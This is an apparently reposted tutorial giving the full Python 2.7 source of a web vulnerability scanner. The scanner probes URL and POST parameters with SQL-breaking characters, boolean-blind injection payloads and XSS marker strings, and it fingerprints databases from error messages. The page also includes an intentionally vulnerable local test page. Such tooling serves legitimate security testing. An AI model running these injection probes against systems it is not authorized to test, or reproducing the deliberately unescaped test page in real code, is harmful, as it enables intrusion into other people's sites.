Implementing a Web Vulnerability Scanning Tool with a Python Script

Source: Internet
Author: User
Tags: HTTP cookie, simple SQL injection, SQL injection, Access database, file permissions, Python script

This is a small web vulnerability scanning tool I wrote last year. It mainly targets simple SQL injection, blind SQL injection, and XSS vulnerabilities. The idea comes from the source code of two small tools I found on GitHub by a well-known developer (said to be one of the authors of sqlmap); after studying them I wrote my own version. Below are the usage instructions and the source code.

First, usage instructions:

1. Operating Environment:

Linux command line + Python 2.7

2. Create the program file:

vim scanner    // create a file named scanner and paste in the source code below

chmod a+x scanner    // make the file executable

3. Run the program:

python scanner    // run the script

If no target URL is supplied, the program prints its help information, listing the parameters that can be passed in.

The parameters include (the sketch after this list shows how these options end up as HTTP request headers):

-h, --help      print help information
--url           target URL to scan
--data          parameters of a POST request
--cookie        HTTP Cookie header value
--user-agent    HTTP User-Agent header value
--random-agent  use a randomly selected browser User-Agent (browser disguise)
--referer       HTTP Referer header value (the page linking to the target URL)
--proxy         HTTP proxy address
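
Under the hood, these options are simply turned into HTTP request headers (plus, for --proxy, a urllib2 proxy handler), which is what init_options() does in the source code further down. Below is a minimal sketch of that mapping; the helper names (build_headers, install_proxy) and the truncated cookie value are my own illustration, not part of the scanner.

# Minimal sketch of how the CLI options become request headers (mirrors init_options() below).
import random, urllib2

USER_AGENTS = ("Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0",)  # shortened list

def build_headers(cookie=None, ua=None, referer=None, random_agent=False):
    if random_agent:
        ua = random.choice(USER_AGENTS)                        # what --random-agent does
    candidates = (("Cookie", cookie), ("User-Agent", ua or "scanner"), ("Referer", referer))
    return dict((name, value) for name, value in candidates if value)   # keep only supplied options

def install_proxy(proxy=None):
    if proxy:                                                  # e.g. --proxy=http://127.0.0.1:8080
        urllib2.install_opener(urllib2.build_opener(urllib2.ProxyHandler({"http": proxy})))

headers = build_headers(cookie="security=low; PHPSESSID=...", random_agent=True)
req = urllib2.Request("http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit", None, headers)
# the scanner then fetches the page with urllib2.urlopen(req, timeout=30)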

For example, to scan "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=&Submit=Submit":

python scanner --url="http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="security=low; PHPSESSID=menntb9b2isj7qha739ihg9of1"

The scan output shows the following results (a simplified sketch of the detection logic behind them follows this list):

There is an XSS vulnerability; it matched the pattern-library entry ">.xss.<", i.e. the injected payload is reflected outside of any tag.

There is a SQL injection vulnerability, and the error messages identify the target web server's database as MySQL.

There is a blind SQL injection vulnerability.
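
To make these findings concrete, here is a simplified sketch (my own, run against made-up response snippets) of the three checks as implemented in scan_page_xss() and scan_page_sql() in the source code below: error-message fingerprinting of the DBMS, boolean-blind comparison of page similarity with difflib (the 0.95 thresholds are the ones the scanner uses), and reflected-marker matching for XSS.

# Simplified sketch of the scanner's three checks, applied to made-up response bodies.
import difflib, re

DBMS_ERRORS = {                                   # trimmed version of the scanner's table
    "MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*"),
    "Oracle": (r"ORA-[0-9][0-9][0-9][0-9]",),
}

error_page = "You have an error in your SQL syntax; check the manual for your MySQL server"
original   = "Welcome admin. ID: 1. First name: admin. Surname: admin."
true_page  = "Welcome admin. ID: 1. First name: admin. Surname: admin."   # response to "AND 1=1"
false_page = "Welcome admin. ID: 1."                                      # response to "AND 2=1"

# 1) error-based SQLi: a DBMS error signature in the response also reveals the database type
for dbms, regexes in DBMS_ERRORS.items():
    if any(re.search(regex, error_page, re.I) for regex in regexes):
        print "error-based SQLi suspected, database looks like %s" % dbms

# 2) boolean-blind SQLi: the TRUE page must stay close to the original, the FALSE page must differ
ratio_true = difflib.SequenceMatcher(None, original, true_page).quick_ratio()
ratio_false = difflib.SequenceMatcher(None, original, false_page).quick_ratio()
if ratio_true > 0.95 and ratio_false < 0.95:
    print "blind SQLi suspected (TRUE ~%.2f, FALSE ~%.2f)" % (ratio_true, ratio_false)

# 3) reflected XSS: a random marker plus special characters is injected and then searched for
#    in a dangerous context, here ">.xss.<" (outside of tags), matching the reported finding
reflection = "<body>id is: 1'kmxqz<'>\";utrse</body>"      # hypothetical reflected payload
if re.search(r">[^<]*kmxqz[^<]*", reflection):
    print "reflected XSS suspected: marker appears outside of any tag"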

Second, the source code:

The code has been verified to run; I recommend testing it against DVWA (a throwaway local test page is also sketched after the source code).

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import difflib, httplib, itertools, optparse, random, re, string, urllib, urllib2

NAME = "Scanner for RXSS and SQLi"
AUTHOR = "lishuze"

# building blocks for boolean-based blind SQL injection payloads
PREFIXES = (" ", ") ", "' ", "') ", "\" ")
SUFFIXES = ("", "-- -", "#")
BOOLEAN_TESTS = ("AND %d=%d", "OR NOT (%d=%d)")

# characters appended to parameter values to provoke SQL errors / XSS reflections
TAMPER_SQL_CHAR_POOL = ('(', ')', '\'', '"')
TAMPER_XSS_CHAR_POOL = ('\'', '"', '>', '<', ';')

GET, POST = "GET", "POST"
COOKIE, UA, REFERER = "Cookie", "User-Agent", "Referer"
TEXT, HTTPCODE, TITLE, HTML = xrange(4)

_headers = {}

USER_AGENTS = (
    "Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36",
    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21",
)

# (regex template, human-readable description, regex of content to strip before matching)
XSS_PATTERNS = (
    (r"<!--[^>]*%(chars)s|%(chars)s[^<]*-->",
     "\"<!--.'.xss.'.-->\", inside the comment", None),
    (r"(?s)<script[^>]*>[^<]*?'[^<']*%(chars)s|%(chars)s[^<']*'[^<]*</script>",
     "\"<script>.'.xss.'.</script>\", enclosed by <script> tags, inside single-quotes", None),
    (r'(?s)<script[^>]*>[^<]*?"[^<"]*%(chars)s|%(chars)s[^<"]*"[^<]*</script>',
     "'<script>.\".xss.\".</script>', enclosed by <script> tags, inside double-quotes", None),
    (r"(?s)<script[^>]*>[^<]*?%(chars)s|%(chars)s[^<]*</script>",
     "\"<script>.xss.</script>\", enclosed by <script> tags", None),
    (r">[^<]*%(chars)s[^<]*(<|\Z)",
     "\">.xss.<\", outside of tags", r"(?s)<script.+?</script>|<!--.*?-->"),
    (r"<[^>]*'[^>']*%(chars)s[^>']*'[^>]*>",
     "\"<.'.xss.'.>\", inside the tag, inside single-quotes", r"(?s)<script.+?</script>|<!--.*?-->"),
    (r'<[^>]*"[^>"]*%(chars)s[^>"]*"[^>]*>',
     "'<.\".xss.\".>', inside the tag, inside double-quotes", r"(?s)<script.+?</script>|<!--.*?-->"),
    (r"<[^>]*%(chars)s[^>]*>",
     "\"<.xss.>\", inside the tag, outside of quotes", r"(?s)<script.+?</script>|<!--.*?-->"),
)

# error message signatures used to fingerprint the backend DBMS
DBMS_ERRORS = {
    "MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
    "Microsoft SQL Server": (r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver",
                             r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}",
                             r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."),
    "Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
    "Oracle": (r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"),
}

def _retrieve_content_xss(url, data=None):
    # re-encode spaces in the query string, then fetch the raw page body
    surl = ""
    for i in xrange(len(url)):
        if i > url.find('?'):
            surl += url[i].replace(" ", "%20")
        else:
            surl += url[i]
    try:
        req = urllib2.Request(surl, data, _headers)
        retval = urllib2.urlopen(req, timeout=30).read()
    except Exception, ex:
        retval = getattr(ex, "message", "")
    return retval or ""

def _retrieve_content_sql(url, data=None):
    # fetch the page and keep the HTTP code, title, raw HTML and tag-stripped text
    retval = {HTTPCODE: httplib.OK}
    surl = ""
    for i in xrange(len(url)):
        if i > url.find('?'):
            surl += url[i].replace(" ", "%20")
        else:
            surl += url[i]
    try:
        req = urllib2.Request(surl, data, _headers)
        retval[HTML] = urllib2.urlopen(req, timeout=30).read()
    except Exception, ex:
        retval[HTTPCODE] = getattr(ex, "code", None)
        retval[HTML] = getattr(ex, "message", "")
    match = re.search(r"<title>(?P<result>[^<]+)</title>", retval[HTML], re.I)
    retval[TITLE] = match.group("result") if match else None
    retval[TEXT] = re.sub(r"(?si)<script.+?</script>|<!--.+?-->|<style.+?</style>|<[^>]+>|\s+", " ", retval[HTML])
    return retval

def scan_page_xss(url, data=None):
    print "Start scanning RXSS:\n"
    retval, usable = False, False
    url = re.sub(r"=(&|\Z)", r"=1\g<1>", url) if url else url
    data = re.sub(r"=(&|\Z)", r"=1\g<1>", data) if data else data
    try:
        for phase in (GET, POST):
            current = url if phase is GET else (data or "")
            for match in re.finditer(r"((\A|[?&;])(?P<parameter>[\w]+)=)(?P<value>[^&]+)", current):
                found, usable = False, True
                print "Scanning %s parameter '%s'" % (phase, match.group("parameter"))
                prefix = "".join(random.sample(string.ascii_lowercase, 5))
                suffix = "".join(random.sample(string.ascii_lowercase, 5))
                if not found:
                    # inject a random marker wrapped around the XSS character pool
                    tampered = current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote("%s%s%s%s" % ("'", prefix, "".join(random.sample(TAMPER_XSS_CHAR_POOL, len(TAMPER_XSS_CHAR_POOL))), suffix))))
                    content = _retrieve_content_xss(tampered, data) if phase is GET else _retrieve_content_xss(url, tampered)
                    for sample in re.finditer("%s([^ ]+?)%s" % (prefix, suffix), content, re.I):
                        for regex, info, content_removal_regex in XSS_PATTERNS:
                            context = re.search(regex % {"chars": re.escape(sample.group(0))}, re.sub(content_removal_regex or "", "", content), re.I)
                            if context and not found and sample.group(1).strip():
                                print "!!! %s parameter '%s' appears to be XSS vulnerable (%s)" % (phase, match.group("parameter"), info)
                                found = retval = True
        if not usable:
            print " (x) no usable GET/POST parameters found"
    except KeyboardInterrupt:
        print "\r (x) Ctrl-C pressed"
    return retval

def scan_page_sql(url, data=None):
    print "Start scanning SQLi:\n"
    retval, usable = False, False
    url = re.sub(r"=(&|\Z)", r"=1\g<1>", url) if url else url
    data = re.sub(r"=(&|\Z)", r"=1\g<1>", data) if data else data
    try:
        for phase in (GET, POST):
            current = url if phase is GET else (data or "")
            for match in re.finditer(r"((\A|[?&;])(?P<parameter>\w+)=)(?P<value>[^&]+)", current):
                vulnerable, usable = False, True
                original = None
                print "Scanning %s parameter '%s'" % (phase, match.group("parameter"))
                # error-based check: append SQL-breaking characters and look for DBMS error messages
                tampered = current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote("".join(random.sample(TAMPER_SQL_CHAR_POOL, len(TAMPER_SQL_CHAR_POOL))))))
                content = _retrieve_content_sql(tampered, data) if phase is GET else _retrieve_content_sql(url, tampered)
                for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
                    if not vulnerable and re.search(regex, content[HTML], re.I):
                        print "!!! %s parameter '%s' could be error SQLi vulnerable (%s)" % (phase, match.group("parameter"), dbms)
                        retval = vulnerable = True
                # boolean-based blind check: compare TRUE and FALSE payload responses against the original page
                vulnerable = False
                original = original or (_retrieve_content_sql(current, data) if phase is GET else _retrieve_content_sql(url, current))
                for prefix, boolean, suffix in itertools.product(PREFIXES, BOOLEAN_TESTS, SUFFIXES):
                    if not vulnerable:
                        template = "%s%s%s" % (prefix, boolean, suffix)
                        payloads = dict((_, current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote(template % (1 if _ else 2, 1), safe='%')))) for _ in (True, False))
                        contents = dict((_, _retrieve_content_sql(payloads[_], data) if phase is GET else _retrieve_content_sql(url, payloads[_])) for _ in (False, True))
                        if all(_[HTTPCODE] for _ in (original, contents[True], contents[False])) and (any(original[_] == contents[True][_] != contents[False][_] for _ in (HTTPCODE, TITLE))):
                            vulnerable = True
                        else:
                            ratios = dict((_, difflib.SequenceMatcher(None, original[TEXT], contents[_][TEXT]).quick_ratio()) for _ in (True, False))
                            vulnerable = all(ratios.values()) and ratios[True] > 0.95 and ratios[False] < 0.95
                        if vulnerable:
                            print "!!! %s parameter '%s' could be blind SQLi vulnerable" % (phase, match.group("parameter"))
                            retval = True
        if not usable:
            print " (x) no usable GET/POST parameters found"
    except KeyboardInterrupt:
        print "\r (x) Ctrl-C pressed"
    return retval

def init_options(proxy=None, cookie=None, ua=None, referer=None):
    global _headers
    _headers = dict(filter(lambda _: _[1], ((COOKIE, cookie), (UA, ua or NAME), (REFERER, referer))))
    urllib2.install_opener(urllib2.build_opener(urllib2.ProxyHandler({'http': proxy})) if proxy else None)

if __name__ == "__main__":
    print "-" * 82
    print "%s\nBy: %s" % (NAME, AUTHOR)
    print "-" * 82
    parser = optparse.OptionParser()
    parser.add_option("--url", dest="url", help="Target URL")
    parser.add_option("--data", dest="data", help="POST data")
    parser.add_option("--cookie", dest="cookie", help="HTTP Cookie header value")
    parser.add_option("--user-agent", dest="ua", help="HTTP User-Agent header value")
    parser.add_option("--random-agent", dest="randomAgent", action="store_true", help="use randomly selected HTTP User-Agent header value")
    parser.add_option("--referer", dest="referer", help="HTTP Referer header value")
    parser.add_option("--proxy", dest="proxy", help="HTTP proxy address")
    options, _ = parser.parse_args()
    if options.url:
        init_options(options.proxy, options.cookie, options.ua if not options.randomAgent else random.choice(USER_AGENTS), options.referer)
        target = options.url if options.url.startswith("http") else "http://%s" % options.url
        result_xss = scan_page_xss(target, options.data)
        print "\nScan results: %s vulnerabilities found" % ("possible" if result_xss else "no")
        print "-" * 82
        result_sql = scan_page_sql(target, options.data)
        print "\nScan results: %s vulnerabilities found" % ("possible" if result_sql else "no")
        print "-" * 82
    else:
        parser.print_help()
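
As noted above, DVWA is the recommended test target. If a DVWA instance is not handy, the throwaway test page below (my own sketch, not part of the original tool) reflects the "id" parameter without escaping and appends a MySQL-style error message whenever the value contains a quote character, so scanning http://127.0.0.1:8000/?id=1 should trigger both the reflected-XSS and the error-based SQLi checks.

# Throwaway vulnerable test page for exercising the scanner locally (Python 2.7).
import BaseHTTPServer, urlparse

MYSQL_ERROR = ("You have an error in your SQL syntax; check the manual "
               "that corresponds to your MySQL server version")

class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(self):
        params = urlparse.parse_qs(urlparse.urlparse(self.path).query)
        value = params.get("id", [""])[0]
        body = "<html><body>id is: %s<br>" % value       # reflected without escaping -> XSS
        if "'" in value or '"' in value:                  # crude simulation of a broken SQL query
            body += MYSQL_ERROR
        body += "</body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    print "serving test page on http://127.0.0.1:8000/?id=1"
    BaseHTTPServer.HTTPServer(("127.0.0.1", 8000), Handler).serve_forever()

Run it in one terminal and point the scanner at it in another: python scanner --url="http://127.0.0.1:8000/?id=1".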

That concludes this introduction to implementing a web vulnerability scanning tool with a Python script. I hope it helps; if you have any questions, please leave me a message and I will reply as soon as possible. Thanks also to everyone for supporting the site.
